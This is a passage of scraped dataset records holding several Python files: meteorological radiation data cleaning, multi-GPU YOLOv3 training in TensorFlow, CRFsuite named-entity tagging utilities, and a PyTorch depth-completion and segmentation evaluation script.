PD_D_meteo_fd.copy()\n PD_D_meteo_for_simulation[\"Date\"] = PD_D_meteo_for_simulation.index.date\n PD_D_meteo_for_simulation[\"Time\"] = PD_D_meteo_for_simulation.index.time\n if station_name == \"pucheng\":\n L_colunms = [\"Date\", \"Time\", \"meteo_01__radiation_10\"]\n L_colunms_cn = {\"Date\": \"日期\", \"Time\": \"时间\", \"meteo_01__radiation_10\": \"水平辐射\"}\n else:\n L_colunms = [\"Date\", \"Time\", \"meteo_01__radiation_01\"]\n L_colunms_cn = {\"Date\": \"日期\", \"Time\": \"时间\", \"meteo_01__radiation_01\": \"水平辐射\"}\n \n PD_D_meteo_for_simulation = PD_D_meteo_for_simulation[L_colunms]\n PD_D_meteo_for_simulation.rename(columns = L_colunms_cn, inplace=True)\n\n if save_csv is True:\n PD_D_meteo_fd.to_csv(\n self.path_output + \n '_'.join([db_name, year, month, \"_radiation_after_cleaning.csv\"])\n ) \n PD_D_meteo_for_simulation.to_csv(\n self.path_output + \n '_'.join([db_name, year, month, \"_radiation_for_simulation.csv\"]), \n index=False,\n encoding=\"gb2312\"\n )\n PD_D_sun_info.to_csv(\n self.path_output + \n '_'.join([db_name, year, month, \"_sun_info.csv\"])\n ) \n PD_D_rad_daily_src.to_csv(\n self.path_output + \n '_'.join([db_name, year, month, \"_rad_mean_src.csv\"]) \n )\n PD_D_rad_daily_proc.to_csv(\n self.path_output + \n '_'.join([db_name, year, month, \"_rad_mean_proc.csv\"]) \n ) \n\n T_meteo_cleaning_info = (\n PD_D_sun_info, \n PD_D_meteo_for_simulation, \n PD_D_rad_daily_src, \n PD_D_rad_daily_proc\n ) \n return PD_D_meteo_fd, T_meteo_cleaning_info\n \n\n \n \n \n\n'''\n# ======================================================================================================================\n# Function\n# ======================================================================================================================\n'''\n\n\n\n'''\n# ======================================================================================================================\n# Relational Function\n# ======================================================================================================================\n'''\n\n\n'''\n# ======================================================================================================================\n# Application\n# ======================================================================================================================\n'''\n\nif __name__ == '__main__':\n \n output_path = \"C:/Users/chen/Desktop/\"\n db_name = \"test_daqing\"\n \n myapp = Cleaning(output_path)\n fd = myapp.get_meteo_data_from_csv(output_path, \"daqing_2018_10__radiation_min_src.csv\") \n PD_D_meteo_fd, T_meteo_cleaning_info = myapp.app_meteo_data_cleaning(\"test_daqing\", fd, save_csv=True)\n \n \n \n \n\n\n\n\n \n\n\n\n\n\n\n\n\n\n\n\n \n \n \n\n","sub_path":"monthly_report_(old)/lss_cleaning.py","file_name":"lss_cleaning.py","file_ext":"py","file_size_in_byte":9785,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"32572755","text":"# coding: utf-8\n\nfrom __future__ import division, print_function\n\nimport tensorflow as tf\nimport numpy as np\nimport logging\nfrom tqdm import trange\nimport tensorflow.contrib.slim as slim\nimport os\n# os.environ['TF_AUTO_MIXED_PRECISION_GRAPH_REWRITE_IGNORE_PERFORMANCE'] = '1'\nos.environ['CUDA_VISIBLE_DEVICES']='0,1'\n# import args\nfrom utils.data_utils import get_batch_data\nfrom utils.misc_utils import shuffle_and_overwrite, make_summary, config_learning_rate, config_optimizer, AverageMeter\nfrom utils.eval_utils import evaluate_on_cpu, evaluate_on_gpu, get_preds_gpu, voc_eval, parse_gt_rec\nfrom utils.nms_utils import gpu_nms\n\nfrom model import yolov3\nimport mutili_gpu_args as args\ndef average_gradients(tower_grads):\n \"\"\"Calculate the average gradient for each shared variable across all towers.\n Note that this function provides a synchronization point across all towers.\n Args:\n tower_grads: List of lists of (gradient, variable) tuples. The outer list\n is over individual gradients. The inner list is over the gradient\n calculation for each tower.\n Returns:\n List of pairs of (gradient, variable) where the gradient has been averaged\n across all towers.\n \"\"\"\n average_grads = []\n for grad_and_vars in zip(*tower_grads):\n # Note that each grad_and_vars looks like the following:\n # ((grad0_gpu0, var0_gpu0), ... , (grad0_gpuN, var0_gpuN))\n grads = []\n for g, _ in grad_and_vars:\n # Add 0 dimension to the gradients to represent the tower.\n expanded_g = tf.expand_dims(g, 0)\n\n # Append on a 'tower' dimension which we will average over below.\n grads.append(expanded_g)\n\n # Average over the 'tower' dimension.\n grad = tf.concat(axis=0, values=grads)\n grad = tf.reduce_mean(grad, 0)\n\n # Keep in mind that the Variables are redundant because they are shared\n # across towers. So .. we will just return the first tower's pointer to\n # the Variable.\n v = grad_and_vars[0][1]\n grad_and_var = (grad, v)\n average_grads.append(grad_and_var)\n return average_grads\n\n\ndef sum_gradients(tower_grads):\n \"\"\"Calculate the average gradient for each shared variable across all towers.\n Note that this function provides a synchronization point across all towers.\n Args:\n tower_grads: List of lists of (gradient, variable) tuples. The outer list\n is over individual gradients. The inner list is over the gradient\n calculation for each tower.\n Returns:\n List of pairs of (gradient, variable) where the gradient has been averaged\n across all towers.\n \"\"\"\n sum_grads = []\n for grad_and_vars in zip(*tower_grads):\n # Note that each grad_and_vars looks like the following:\n # ((grad0_gpu0, var0_gpu0), ... , (grad0_gpuN, var0_gpuN))\n grads = []\n for g, _ in grad_and_vars:\n # Add 0 dimension to the gradients to represent the tower.\n expanded_g = tf.expand_dims(g, 0)\n\n # Append on a 'tower' dimension which we will average over below.\n grads.append(expanded_g)\n\n # Average over the 'tower' dimension.\n grad = tf.concat(axis=0, values=grads)\n grad = tf.reduce_sum(grad, 0)\n\n # Keep in mind that the Variables are redundant because they are shared\n # across towers. So .. we will just return the first tower's pointer to\n # the Variable.\n v = grad_and_vars[0][1]\n grad_and_var = (grad, v)\n sum_grads.append(grad_and_var)\n return sum_grads\n\ndef get_restorer():\n checkpoint_path = args.restore_path\n print(\"model restore from pretrained mode, path is :\", checkpoint_path)\n\n model_variables = slim.get_model_variables()\n for var in model_variables:\n print(var.name)\n print(20*\"__++__++__\")\n\n def name_in_ckpt(var):\n return var.op.name\n\n nameInCkpt_Var_dict = {}\n for var in model_variables:\n if \"Momentum\" not in var.name:\n for exclude_var in args.restore_exclude:\n if exclude_var not in var.name:\n var_name_in_ckpt = name_in_ckpt(var)\n nameInCkpt_Var_dict[var_name_in_ckpt] = var\n restore_variables = nameInCkpt_Var_dict\n for key, item in restore_variables.items():\n print(\"var_in_graph: \", item.name)\n print(\"var_in_ckpt: \", key)\n print(20*\"___\")\n restorer = tf.train.Saver(restore_variables)\n print(20 * \"****\")\n print(\"restore from pretrained_weighs in IMAGE_NET\")\n return restorer, checkpoint_path\n\ndef print_info(image):\n # print(\"all batch img-ids is\", image)\n return 0\n\n# setting loggers\nlogging.basicConfig(level=logging.DEBUG, format='%(asctime)s %(levelname)s %(message)s',\n datefmt='%a, %d %b %Y %H:%M:%S', filename=args.progress_log_path, filemode='w')\n\n# setting placeholders\nis_training = tf.placeholder(tf.bool, name=\"phase_train\")\nhandle_flag = tf.placeholder(tf.string, [], name='iterator_handle_flag')\n# register the gpu nms operation here for the following evaluation scheme\npred_boxes_flag = tf.placeholder(tf.float32, [1, None, None])\npred_scores_flag = tf.placeholder(tf.float32, [1, None, None])\ngpu_nms_op = gpu_nms(pred_boxes_flag, pred_scores_flag, args.class_num, args.nms_topk, args.score_threshold, args.nms_threshold)\n\n##################\n# tf.data pipeline\n##################\n######################## batchsize use 1 will cause gpu1 cannot allocate data, so 1 -> 2 ###########################\n# if args.batch_size == 1:\n# args.batch_size == 2\ntrain_dataset = tf.data.TextLineDataset(args.train_file)\ntrain_dataset = train_dataset.shuffle(args.train_img_cnt)\ntrain_dataset = train_dataset.batch(args.batch_size)\ntrain_dataset = train_dataset.map(\n lambda x: tf.py_func(get_batch_data,\n inp=[x, args.class_num, args.img_size, args.anchors, 'train', args.multi_scale_train, args.use_mix_up, args.letterbox_resize],\n Tout=[tf.int64, tf.float32, tf.float32, tf.float32, tf.float32]),\n num_parallel_calls=args.num_threads\n)\ntrain_dataset = train_dataset.prefetch(args.prefetech_buffer)\n\nval_dataset = tf.data.TextLineDataset(args.val_file)\nval_dataset = val_dataset.batch(1)\n# val_dataset = val_dataset.batch(args.batch_size)\nval_dataset = val_dataset.map(\n lambda x: tf.py_func(get_batch_data,\n inp=[x, args.class_num, args.img_size, args.anchors, 'val', False, False, args.letterbox_resize],\n Tout=[tf.int64, tf.float32, tf.float32, tf.float32, tf.float32]),\n num_parallel_calls=args.num_threads\n)\nval_dataset.prefetch(args.prefetech_buffer)\n\niterator = tf.data.Iterator.from_structure(train_dataset.output_types, train_dataset.output_shapes)\ntrain_init_op = iterator.make_initializer(train_dataset)\nval_init_op = iterator.make_initializer(val_dataset)\n\n# get an element from the chosen dataset iterator\nimage_ids, image, y_true_13, y_true_26, y_true_52 = iterator.get_next()\ny_true = [y_true_13, y_true_26, y_true_52]\n\n# img_name_batch, img_batch, gtboxes_and_label_batch, num_objects_batch, img_h_batch, img_w_batch = \\\ninputs_list = []\ny_true_batch= []\nimage_ids_batch = []\nimage_batch = []\nfor i in range(args.NUM_GPU):\n start = i*(args.batch_size//args.NUM_GPU)\n end = (i+1)*(args.batch_size//args.NUM_GPU)\n\n img = image[start:end, :, :, :]\n id_img = image_ids[start:end]\n\n\n y_true_13_batch = y_true_13[start:end, :, :]\n y_true_26_batch = y_true_26[start:end, :, :]\n y_true_52_batch = y_true_52[start:end, :, :]\n imag_info = tf.py_func(print_info, inp=[y_true_13_batch], Tout=[tf.int64])\n\n y_true_batch.append([y_true_13_batch, y_true_26_batch, y_true_52_batch])\n image_batch.append(img)\n image_ids_batch.append(id_img)\n\n image_ids_batch[i].set_shape([None])\n image_batch[i].set_shape([None, None, None, 3])\n for y in y_true_batch[i]:\n y.set_shape([None, None, None, None, None])\n\n\n# with tf.Session() as sess:\n# sess.run([tf.global_variables_initializer(), tf.local_variables_initializer()])\n# for epoch in range(args.total_epoches):\n# sess.run(train_init_op)\n# for i in trange(args.train_batch_num ):\n# # for i in trange(1):\n# a, b, c, d= sess.run(\n# [image_ids_batch, image_batch, y_true_batch, imag_info] )\n# print('img_id id bantch is', a)\n# print('y_ture_batch is', y_true_batch)\n# print(\"one epoch is finished \")\n# print(\"one epoch is finished \")\n# print(\"one epoch is finished \")\n# print(\"one epoch is finished \")\n # print('e is', e)\n # print('gpu0 y_true batch is', c)\n # print('gpu1 y_true batch is', d)\n\n\nwith tf.device('/cpu:0'):\n tower_grads = []\n y_pred = []\n loss_gpus = []\n yolo_model = yolov3(args.class_num, args.anchors, args.use_label_smooth, args.use_focal_loss, args.batch_norm_decay, args.weight_decay, use_static_shape=False)\n global_step = tf.Variable(float(args.global_step), trainable=False, collections=[tf.GraphKeys.LOCAL_VARIABLES])\n with tf.variable_scope(tf.get_variable_scope()):\n for i in range(args.NUM_GPU):\n print(\"current gpu is\", i)\n with tf.device('/gpu:%d' % i):\n image_gpu_true = image_batch[i]\n y_gpu_true = y_true_batch[i]\n with tf.variable_scope('yolov3'):\n pred_feature_maps = yolo_model.forward(image_gpu_true, is_training=is_training)\n print(\"featuremap shape is\", pred_feature_maps)\n loss = yolo_model.compute_loss(pred_feature_maps, y_gpu_true)\n y_pred_net = yolo_model.predict(pred_feature_maps)\n loss_gpus.append(loss)\n y_pred.append(y_pred_net)\n\n l2_loss = tf.losses.get_regularization_loss() #[total_loss, loss_xy, loss_wh, loss_conf, loss_class]\n if args.use_warm_up:\n learning_rate = tf.cond(tf.less(global_step, args.train_batch_num * args.warm_up_epoch),\n lambda: args.learning_rate_init * global_step / (\n args.train_batch_num * args.warm_up_epoch),\n lambda: config_learning_rate(args,\n global_step - args.train_batch_num * args.warm_up_epoch))\n else:\n learning_rate = config_learning_rate(args, global_step)\n tf.summary.scalar('learning_rate', learning_rate)\n if not args.save_optimizer:\n saver_to_save = tf.train.Saver()\n saver_best = tf.train.Saver()\n optimizer = config_optimizer(args.optimizer_name, learning_rate)\n saver_to_restore = tf.train.Saver(var_list=tf.contrib.framework.get_variables_to_restore(include=args.restore_include, exclude=args.restore_exclude))\n update_vars = tf.contrib.framework.get_variables_to_restore(include=args.update_part)\n\n tf.summary.scalar('train_batch_statistics/total_loss', loss[0])\n tf.summary.scalar('train_batch_statistics/loss_xy', loss[1])\n tf.summary.scalar('train_batch_statistics/loss_wh', loss[2])\n tf.summary.scalar('train_batch_statistics/loss_conf', loss[3])\n tf.summary.scalar('train_batch_statistics/loss_class', loss[4])\n tf.summary.scalar('train_batch_statistics/loss_l2', l2_loss)\n tf.summary.scalar('train_batch_statistics/loss_ratio', l2_loss / loss[0])\n\n # set dependencies for BN ops\n total_losses = 0.0\n total_losses += loss[0]\n total_losses = total_losses / args.NUM_GPU\n if i == args.NUM_GPU - 1:\n l2_loss = tf.losses.get_regularization_loss()\n total_losses = total_losses + l2_loss\n # l2_loss = tf.losses.get_regularization_loss()\n # total_losses = total_losses + l2_loss\n tf.get_variable_scope().reuse_variables()\n update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS)\n with tf.control_dependencies(update_ops):\n # gvs = optimizer.compute_gradients(loss[0] + l2_loss, var_list=update_vars)\n # clip_grad_var = [gv if gv[0] is None else [\n # tf.clip_by_norm(gv[0], 100.), gv[1]] for gv in gvs]\n grads = optimizer.compute_gradients(total_losses)\n clip_grad_var = [gv if gv[0] is None else [\n tf.clip_by_norm(gv[0], 100.), gv[1]] for gv in grads]\n tower_grads.append(clip_grad_var)\n\n if len(tower_grads) > 1:\n clip_grad_var = sum_gradients(tower_grads)\n else:\n clip_grad_var = tower_grads[0]\n\n train_op = optimizer.apply_gradients(clip_grad_var, global_step=global_step)\n\n if args.save_optimizer:\n print('Saving optimizer parameters to checkpoint! Remember to restore the global_step in the fine-tuning afterwards.')\n saver_to_save = tf.train.Saver()\n saver_best = tf.train.Saver()\n\n config = tf.ConfigProto(allow_soft_placement=True)\n with tf.Session(config=config) as sess:\n sess.run([tf.global_variables_initializer(), tf.local_variables_initializer()])\n\n saver_to_restore.restore(sess, args.restore_path)\n # restorer, restore_ckpt = get_restorer()\n # restorer.restore(sess, restore_ckpt)\n merged = tf.summary.merge_all()\n writer = tf.summary.FileWriter(args.log_dir, sess.graph)\n\n print('\\n----------- start to train -----------\\n')\n best_mAP = -np.Inf\n\n for epoch in range(args.total_epoches):\n sess.run(train_init_op)\n loss_total, loss_xy, loss_wh, loss_conf, loss_class = AverageMeter(), AverageMeter(), AverageMeter(), AverageMeter(), AverageMeter()\n for i in trange(args.train_batch_num):\n if i <= (args.train_batch_num-2):\n _, summary, __y_pred, __y_true, __loss, __global_step, __lr = sess.run(\n [train_op, merged, y_pred, y_true_batch, loss_gpus, global_step, learning_rate],\n feed_dict={is_training: True})\n writer.add_summary(summary, global_step=__global_step)\n loss_total.update((__loss[0][0] + __loss[1][0] ), len(__y_pred[0][0] + __y_pred[1][0]))\n loss_xy.update((__loss[0][1] + __loss[1][1] ), len(__y_pred[0][0] + __y_pred[1][0]))\n loss_wh.update((__loss[0][2] + __loss[1][2] ), len(__y_pred[0][0] + __y_pred[1][0]))\n loss_conf.update((__loss[0][3] + __loss[1][3] ), len(__y_pred[0][0] + __y_pred[1][0]))\n loss_class.update((__loss[0][4] + __loss[1][4] ), len(__y_pred[0][0] + __y_pred[1][0]))\n\n\n if __global_step % args.train_evaluation_step == 0 and __global_step > 0:\n print(\"loss total is\", loss_total.average)\n # recall, precision = evaluate_on_cpu(__y_pred, __y_true, args.class_num, args.nms_topk, args.score_threshold, args.nms_threshold)\n recall, precision = evaluate_on_gpu(sess, gpu_nms_op, pred_boxes_flag, pred_scores_flag, __y_pred[0], __y_true[0], args.class_num, args.nms_threshold)\n recall_1, precision_1 = evaluate_on_gpu(sess, gpu_nms_op, pred_boxes_flag, pred_scores_flag, __y_pred[1], __y_true[1], args.class_num, args.nms_threshold)\n\n recall_muti_gpu = (recall + recall_1)/2.0\n precision_muti_gpu = (precision + precision_1)/2.0\n\n print(\"precision_0, recall_0 is\", precision, recall)\n print(\"precision_1, recall_1 is\", precision_1, recall_1)\n info = \"Epoch: {}, global_step: {} | loss: total: {:.2f}, xy: {:.2f}, wh: {:.2f}, conf: {:.2f}, class: {:.2f} | \".format(\n epoch, int(__global_step), loss_total.average, loss_xy.average, loss_wh.average, loss_conf.average, loss_class.average)\n info += 'Last batch: rec: {:.3f}, prec: {:.3f} | lr: {:.5g}'.format(recall_muti_gpu, precision_muti_gpu, __lr)\n print(info)\n logging.info(info)\n\n writer.add_summary(make_summary('evaluation/train_batch_recall', recall_muti_gpu), global_step=__global_step)\n writer.add_summary(make_summary('evaluation/train_batch_precision', precision_muti_gpu), global_step=__global_step)\n\n if np.isnan(loss_total.average):\n print('****' * 10)\n raise ArithmeticError(\n 'Gradient exploded! Please train again and you may need modify some parameters.')\n\n # NOTE: this is just demo. You can set the conditions when to save the weights.\n if epoch % args.save_epoch == 0 and epoch > 0:\n if loss_total.average <= 2.:\n saver_to_save.save(sess, args.save_dir + 'model-epoch_{}_step_{}_loss_{:.4f}_lr_{:.5g}'.format(epoch, int(__global_step), loss_total.average, __lr))\n\n # switch to validation dataset for evaluation\n if epoch % args.val_evaluation_epoch == 0 and epoch >= args.warm_up_epoch:\n # if epoch % args.val_evaluation_epoch == 0 :\n sess.run(val_init_op)\n val_loss_total, val_loss_xy, val_loss_wh, val_loss_conf, val_loss_class = \\\n AverageMeter(), AverageMeter(), AverageMeter(), AverageMeter(), AverageMeter()\n\n val_preds = []\n\n for j in trange(args.val_img_cnt):\n __image_ids, __y_pred, __loss = sess.run([image_ids_batch[0], y_pred[0], loss_gpus[0]],\n feed_dict={is_training: False})\n\n pred_content = get_preds_gpu(sess, gpu_nms_op, pred_boxes_flag, pred_scores_flag, __image_ids, __y_pred)\n # pred_content = get_preds_gpu(sess, gpu_nms_op, pred_boxes_flag, pred_scores_flag, __image_ids[0], __y_pred[0])\n val_preds.extend(pred_content)\n val_loss_total.update(__loss[0])\n val_loss_xy.update(__loss[1])\n val_loss_wh.update(__loss[2])\n val_loss_conf.update(__loss[3])\n val_loss_class.update(__loss[4])\n\n # calc mAP\n rec_total, prec_total, ap_total = AverageMeter(), AverageMeter(), AverageMeter()\n gt_dict = parse_gt_rec(args.val_file, args.img_size, args.letterbox_resize)\n\n info = '======> Epoch: {}, global_step: {}, lr: {:.6g} <======\\n'.format(epoch, __global_step, __lr)\n\n for ii in range(args.class_num):\n npos, nd, rec, prec, ap = voc_eval(gt_dict, val_preds, ii, iou_thres=args.eval_threshold, use_07_metric=args.use_voc_07_metric)\n info += 'EVAL: Class {}: Recall: {:.4f}, Precision: {:.4f}, AP: {:.4f}\\n'.format(ii, rec, prec, ap)\n rec_total.update(rec, npos)\n prec_total.update(prec, nd)\n ap_total.update(ap, 1)\n\n mAP = ap_total.average\n info += 'EVAL: Recall: {:.4f}, Precison: {:.4f}, mAP: {:.4f}\\n'.format(rec_total.average, prec_total.average, mAP)\n info += 'EVAL: loss: total: {:.2f}, xy: {:.2f}, wh: {:.2f}, conf: {:.2f}, class: {:.2f}\\n'.format(\n val_loss_total.average, val_loss_xy.average, val_loss_wh.average, val_loss_conf.average, val_loss_class.average)\n print(info)\n logging.info(info)\n\n if mAP > best_mAP:\n best_mAP = mAP\n saver_best.save(sess, args.save_dir + 'best_model_Epoch_{}_step_{}_mAP_{:.4f}_loss_{:.4f}_lr_{:.7g}'.format(\n epoch, int(__global_step), best_mAP, val_loss_total.average, __lr))\n\n writer.add_summary(make_summary('evaluation/val_mAP', mAP), global_step=epoch)\n writer.add_summary(make_summary('evaluation/val_recall', rec_total.average), global_step=epoch)\n writer.add_summary(make_summary('evaluation/val_precision', prec_total.average), global_step=epoch)\n writer.add_summary(make_summary('validation_statistics/total_loss', val_loss_total.average), global_step=epoch)\n writer.add_summary(make_summary('validation_statistics/loss_xy', val_loss_xy.average), global_step=epoch)\n writer.add_summary(make_summary('validation_statistics/loss_wh', val_loss_wh.average), global_step=epoch)\n writer.add_summary(make_summary('validation_statistics/loss_conf', val_loss_conf.average), global_step=epoch)\n writer.add_summary(make_summary('validation_statistics/loss_class', val_loss_class.average), global_step=epoch)\n\n","sub_path":"mutili_gpu_train/mutili_gpu_train.py","file_name":"mutili_gpu_train.py","file_ext":"py","file_size_in_byte":21310,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"642387032","text":"#!/usr/bin/env python\n\nimport argparse\nimport subprocess\nfrom subprocess import Popen, PIPE, STDOUT\n\nimport crfsuite\n\nfrom feature_extractor import FeatureExtractor\nfrom text_processing.corpus_utils import CorpusUtils\n\n\ndef sequence_feed(filename, field_names, separator=' '):\n X = []\n with open(filename, 'r') as f:\n for line in f:\n line = line.strip()\n if line == '': # on empty line yield sequence/sentence\n yield X\n X = []\n else:\n fields = line.split(separator)\n if len(fields) < len(field_names):\n raise ValueError('Expected {} fields: {}'.format(\n len(field_names), field_names))\n item = {'F': []} # item features\n for ii, field_name in enumerate(field_names):\n item[field_name] = fields[ii]\n X.append(item)\n\n\ndef output_features(out, X, f):\n for item in X:\n out.write('%s' % item[f])\n for field in item['F']:\n out.write('\\t%s' % field)\n out.write('\\n')\n out.write('\\n')\n\n\ndef features_string(X, f):\n fstr = ''\n for item in X:\n fstr += '%s' % item[f]\n for field in item['F']:\n fstr += '\\t%s' % field\n fstr += '\\n'\n fstr += '\\n'\n return fstr\n\n\ndef to_crfsuite(X):\n \"\"\"\n Convert an item sequence into an object compatible with crfsuite\n Python module.\n\n @type X: list of mapping objects\n @param X: The sequence.\n @rtype crfsuite.ItemSequence\n @return The same sequence in crfsuite.ItemSequence type.\n \"\"\"\n xseq = crfsuite.ItemSequence()\n for x in X:\n item = crfsuite.Item()\n for f in x['F']:\n item.append(crfsuite.Attribute(f))\n xseq.append(item)\n return xseq\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description='CRFsuite utilities')\n subparsers = parser.add_subparsers(dest='command')\n subparsers.required = True\n train_parser = subparsers.add_parser(\n 'train', help='Train a CRF NER model.')\n train_parser.add_argument(\n 'bin',\n help='Path to the CRF-Suite binary. (Usually in ~/local/bin/crfsuite)')\n train_parser.add_argument(\n 'input', help='Training data prepared with the \\'features\\' command.')\n train_parser.add_argument('model', help='Name of the output CRF model.')\n tag_parser = subparsers.add_parser('tag', help='tag file')\n tag_parser.add_argument('model')\n tag_parser.add_argument('input')\n tag_parser.add_argument('output')\n\n args = parser.parse_args()\n\n conll_fields = ['token', 'entity']\n\n if args.command == 'train':\n cmd = [args.bin, 'learn', '-m', args.model, args.input]\n subprocess.call(cmd)\n elif args.command == 'tag':\n fextractor = FeatureExtractor()\n print('feature extractor loaded')\n\n tagger = crfsuite.Tagger()\n tagger.open(args.model)\n\n cu = CorpusUtils(sent_split=True)\n with open(args.input, 'r') as _in:\n text = _in.readlines()\n\n tags = {}\n with open(args.output, 'w') as out:\n for X in cu.crf_sequence_feed(text):\n fextractor.sequence_features(X)\n xseq = to_crfsuite(X)\n yseq = tagger.tag(xseq)\n for ii, v in enumerate(X):\n if yseq[ii] != 'O':\n tags[v['token']] = yseq[ii]\n for ii, v in enumerate(X):\n out.write('\\t'.join(v[f] for f in conll_fields))\n out.write('\\t%s\\n' % yseq[ii])\n out.write('\\n')\n print(tags)","sub_path":"src/ner/crf_utils.py","file_name":"crf_utils.py","file_ext":"py","file_size_in_byte":3706,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"573085916","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Mar 31 16:13:01 2020\n\n@author: kerui\n\"\"\"\n\nimport argparse\nimport os\nimport time\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.parallel\nimport torch.optim\nimport torch.utils.data\n\nfrom dataloaders.completion_segmentation_loader_new import load_calib, oheight, owidth, input_options, KittiDepth\nfrom completion_segmentation_model import DepthCompletionNet\nfrom metrics import AverageMeter, Result\nimport criteria\nimport completion_segmentation_helper\nfrom inverse_warp import Intrinsics, homography_from\nfrom torchviz import make_dot\n\n#from torchsummary import summary\n\nparser = argparse.ArgumentParser(description='Sparse-to-Dense')\nparser.add_argument('-w',\n '--workers',\n default=4,\n type=int,\n metavar='N',\n help='number of data loading workers (default: 4)')\nparser.add_argument('--epochs',\n default=11,\n type=int,\n metavar='N',\n help='number of total epochs to run (default: 11)')\nparser.add_argument('--start-epoch',\n default=0,\n type=int,\n metavar='N',\n help='manual epoch number (useful on restarts)')\nparser.add_argument('-c',\n '--criterion',\n metavar='LOSS',\n default='l2',\n choices=criteria.loss_names,\n help='loss function: | '.join(criteria.loss_names) +\n ' (default: l2)')\nparser.add_argument('--image_height',\n default=80,\n type=int,\n help='height of image for train (default: 80)')\n\nparser.add_argument('--image_width',\n default=80,\n type=int,\n help='width of image for train (default: 80)')\n\nparser.add_argument('-b',\n '--batch-size',\n default=1,\n type=int,\n help='mini-batch size (default: 1)')\nparser.add_argument('--lr',\n '--learning-rate',\n default=1e-5,\n type=float,\n metavar='LR',\n help='initial learning rate (default 1e-5)')\nparser.add_argument('--weight-decay',\n '--wd',\n default=0,\n type=float,\n metavar='W',\n help='weight decay (default: 0)')\nparser.add_argument('--print-freq',\n '-p',\n default=10,\n type=int,\n metavar='N',\n help='print frequency (default: 10)')\nparser.add_argument('--resume',\n default='',\n type=str,\n metavar='PATH',\n help='path to latest checkpoint (default: none)')\nparser.add_argument('--data-folder',\n default='../data',\n type=str,\n metavar='PATH',\n help='data folder (default: none)')\nparser.add_argument('-i',\n '--input',\n type=str,\n default='gd',\n choices=input_options,\n help='input: | '.join(input_options))\nparser.add_argument('-l',\n '--layers',\n type=int,\n default=34,\n help='use 16 for sparse_conv; use 18 or 34 for resnet')\nparser.add_argument('--pretrained',\n action=\"store_true\",\n help='use ImageNet pre-trained weights')\nparser.add_argument('--val',\n type=str,\n default=\"select\",\n choices=[\"select\", \"full\"],\n help='full or select validation set')\nparser.add_argument('--jitter',\n type=float,\n default=0.1,\n help='color jitter for images')\nparser.add_argument(\n '--rank-metric',\n type=str,\n default='rmse',\n choices=[m for m in dir(Result()) if not m.startswith('_')],\n help='metrics for which best result is sbatch_datacted')\nparser.add_argument(\n '-m',\n '--train-mode',\n type=str,\n default=\"dense\",\n choices=[\"dense\", \"sparse\", \"photo\", \"sparse+photo\", \"dense+photo\"],\n help='dense | sparse | photo | sparse+photo | dense+photo')\nparser.add_argument('-e', '--evaluate', default='', type=str, metavar='PATH')\nparser.add_argument('--cpu', action=\"store_true\", help='run on cpu')\n\nargs = parser.parse_args()\nargs.use_pose = (\"photo\" in args.train_mode)\n# args.pretrained = not args.no_pretrained\nargs.result = os.path.join('..', 'results')\nargs.use_rgb = ('rgb' in args.input) or args.use_pose\nargs.use_d = 'd' in args.input\nargs.use_g = 'g' in args.input\nif args.use_pose:\n args.w1, args.w2 = 0.1, 0.1\nelse:\n args.w1, args.w2 = 0, 0\nprint(args)\n\ncuda = torch.cuda.is_available() and not args.cpu\nif cuda:\n import torch.backends.cudnn as cudnn\n cudnn.benchmark = True\n device = torch.device(\"cuda\")\nelse:\n device = torch.device(\"cpu\")\nprint(\"=> using '{}' for computation.\".format(device))\n\n# define loss functions\ndepth_criterion = criteria.MaskedMSELoss() if (\n args.criterion == 'l2') else criteria.MaskedL1Loss()\nphotometric_criterion = criteria.PhotometricLoss()\nsmoothness_criterion = criteria.SmoothnessLoss()\nsegmentation_criterion = nn.NLLLoss2d() # 语义分割loss\n\nif args.use_pose:\n # hard-coded KITTI camera intrinsics\n K = load_calib()\n fu, fv = float(K[0, 0]), float(K[1, 1])\n cu, cv = float(K[0, 2]), float(K[1, 2])\n kitti_intrinsics = Intrinsics(owidth, oheight, fu, fv, cu, cv)\n if cuda:\n kitti_intrinsics = kitti_intrinsics.cuda()\n\n\ndef iterate(mode, args, loader, model, optimizer, logger, epoch):\n # switch to appropriate mode\n assert mode in [\"train\", \"val\", \"eval\", \"test_prediction\", \"test_completion_segmentation\", \"test_completion\"], \\\n \"unsupported mode: {}\".format(mode)\n model.eval()\n\n for i, batch_data in enumerate(loader):\n start = time.time()\n batch_data = {\n key: val.to(device)\n for key, val in batch_data.items() if val is not None\n }\n \n data_time = time.time() - start\n\n start = time.time()\n \n # 2020/03/27\n \n with torch.no_grad(): # 自己加的, 设置torch.no_grad(),在val时不计算梯度,可以节省显存\n pred = model(batch_data)\n \n \n # 预测值\n completion_pred, segmentation_pred = pred\n\n gpu_time = time.time() - start\n\n # 打印信息\n logger.test_print(mode, i, len(loader))\n # 保存预测结果为图片\n logger.conditional_save_pred(mode, i, pred, epoch)\n\n\ndef main():\n global args\n checkpoint = None\n is_eval = True # 测试\n if args.evaluate:\n args_new = args\n if os.path.isfile(args.evaluate):\n print(\"=> loading checkpoint '{}' ... \".format(args.evaluate),\n end='')\n checkpoint = torch.load(args.evaluate, map_location=device)\n args = checkpoint['args']\n args.data_folder = args_new.data_folder\n args.val = args_new.val\n is_eval = True\n print(\"Completed.\")\n else:\n print(\"No model found at '{}'\".format(args.evaluate))\n return\n\n print(\"=> creating model and optimizer ... \", end='')\n model = DepthCompletionNet(args).to(device)\n \n \n model_named_params = [\n p for _, p in model.named_parameters() if p.requires_grad\n ]\n optimizer = torch.optim.Adam(model_named_params,\n lr=args.lr,\n weight_decay=args.weight_decay)\n print(\"completed.\")\n if checkpoint is not None:\n model.load_state_dict(checkpoint['model'])\n optimizer.load_state_dict(checkpoint['optimizer'])\n print(\"=> checkpoint state loaded.\")\n\n model = torch.nn.DataParallel(model)\n\n # Data loading code\n \n val_dataset = KittiDepth('test_completion_segmentation', args)\n val_loader = torch.utils.data.DataLoader(\n val_dataset,\n batch_size=1,\n shuffle=False,\n num_workers=2,\n pin_memory=True) # set batch size to be 1 for validation\n print(\"\\t==> val_loader size:{}\".format(len(val_loader)))\n\n # create backups and results folder\n logger = completion_segmentation_helper.logger(args)\n 